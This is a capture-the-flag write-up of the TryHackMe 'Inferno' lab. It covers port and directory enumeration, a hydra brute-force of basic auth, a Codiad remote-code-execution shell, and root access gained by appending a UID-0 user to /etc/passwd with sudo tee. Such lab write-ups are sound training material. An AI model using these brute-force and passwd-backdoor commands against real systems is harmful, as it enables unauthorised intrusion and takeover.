Introduction
The Inferno room on TryHackMe is described as a “Real Life machine vs CTF. The machine is designed to be real-life and is perfect for newbies starting out in penetration testing”. The goal is to find two keys on the machine (user – local.txt and root – proof.txt)
Enumeration
After performing an nmap scan we find a lot of open ports on the target. But after investigating the ports the only ones that are running any services are port 22 and port 80.
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Dante's Inferno
When we take a look at the web page all we get is some text and an image.
Lets see what we can find out by using gobuster.
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.211.173/
[+] Threads: 40
[+] Wordlist: directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/02/13 13:47:05 Starting gobuster
===============================================================
/inferno (Status: 401)
/server-status (Status: 403)
===============================================================
2021/02/13 13:51:39 Finished
===============================================================We found a directory called inferno, but it’s protected with basic auth.
Gaining access
We want to gain access to the protected directory inferno. But we don’t have any credentials or even usernames. We can create a short list of possible usernames to use with hydra.
root admin dante inferno
Using those usernames and rockyou for the passwords we get a result when we try the username admin.
[80][http-get] host: 10.10.x.x login: admin password: <REDACTED>
[STATUS] attack finished for 10.10.x.x (valid pair found)
1 of 1 target successfully completed, 1 valid password foundNow we can log in to the protected path. When we gain access we get a log-in screen, using the same credentials for the basic auth we gain access to a web IDE.
After poking around a bit we discover that we don’t have permission to create or edit any file. We also find out that the web IDE is Codiad and that it’s no longer maintained. Using searchsploit we find two different vulnerabilities, but none is working on our target.
When we google for codiad exploit we find a RCE for the latest version of Codiad. Following the instructions and running the exploit against our target we get a remote shell!
listening on [any] 4445 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.x.x] 42772
bash: cannot set terminal process group (934): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Inferno:/var/www/html/inferno/components/filemanager$ whoami
whoami
www-data
www-data@Inferno:/var/www/html/inferno/components/filemanager$Gaining user access
Checking out the /home directory we find the home directory for the user dante and that we have read permissions. After some digging around in the home directory we can find a file called .download.dat in the Downloads directory. The contents of the file is a hexdump, and when we decode the file we get the following.
«Or se’ tu quel Virgilio e quella fonte che spandi di parlar sì largo fiume?», rispuos’io lui con vergognosa fronte. «O de li altri poeti onore e lume, vagliami ’l lungo studio e ’l grande amore che m’ha fatto cercar lo tuo volume. Tu se’ lo mio maestro e ’l mio autore, tu se’ solo colui da cu’ io tolsi lo bello stilo che m’ha fatto onore. Vedi la bestia per cu’ io mi volsi; aiutami da lei, famoso saggio, ch’ella mi fa tremar le vene e i polsi». dante:<REDACTED>
Looks like some credentials at the last line. Lets try them out.
ssh -l dante 10.10.x.x dante@10.10.x.x's password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-130-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sat Feb 13 17:43:27 UTC 2021 System load: 0.08 Processes: 605 Usage of /: 42.3% of 8.79GB Users logged in: 0 Memory usage: 63% IP address for eth0: 10.10.x.x Swap usage: 0% 39 packages can be updated. 0 updates are security updates. Last login: Mon Jan 11 15:56:07 2021 from 192.168.1.109 dante@Inferno:~$
Awesome! Lets grab the user flag.
dante@Inferno:~$ cat local.txt <FLAG>
Privilege escalation
Now it’s time to find a way to get root privileges, lets check our sudo access.
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dante may run the following commands on Inferno:
(root) NOPASSWD: /usr/bin/tee
So we have access to tee which means we are able to write text to files as root. Lets try to add an entry in /etc/passwd with root privileges. First we need to create a password hash for our new user, we can do that by running openssl passwd -1 -salt pwn pwn which gives us the hash $1$pwn$AxNbnbaujRUXRur/DewJ8/. Now we can use this to create a new entry.
dante@Inferno:~$ echo "pwn:\$1\$pwn\$AxNbnbaujRUXRur/DewJ8/:0:0:root:/root:/bin/bash" | sudo tee -a /etc/passwd pwn:$1$pwn$AxNbnbaujRUXRur/DewJ8/:0:0:root:/root:/bin/bash
Lets find out if it works.
dante@Inferno:~$ su pwn Password: root@Inferno:/home/dante# cd /root root@Inferno:~# ls -al total 32 drwx------ 5 root root 4096 Jan 11 15:45 . drwxr-xr-x 24 root root 4096 Jan 11 14:57 .. lrwxrwxrwx 1 root root 9 Jan 11 15:22 .bash_history -> /dev/null -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc drwxr-x--- 3 root root 4096 Jan 11 15:45 .config drwxr-xr-x 3 root root 4096 Jan 11 15:30 .local -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw------- 1 root root 79 Jan 11 15:45 proof.txt drwx------ 2 root root 4096 Jan 11 15:19 .ssh
Great! Now lets grab the root flag.
root@Inferno:~# cat proof.txt Congrats! You've rooted Inferno! <FLAG> mindsflee
kza 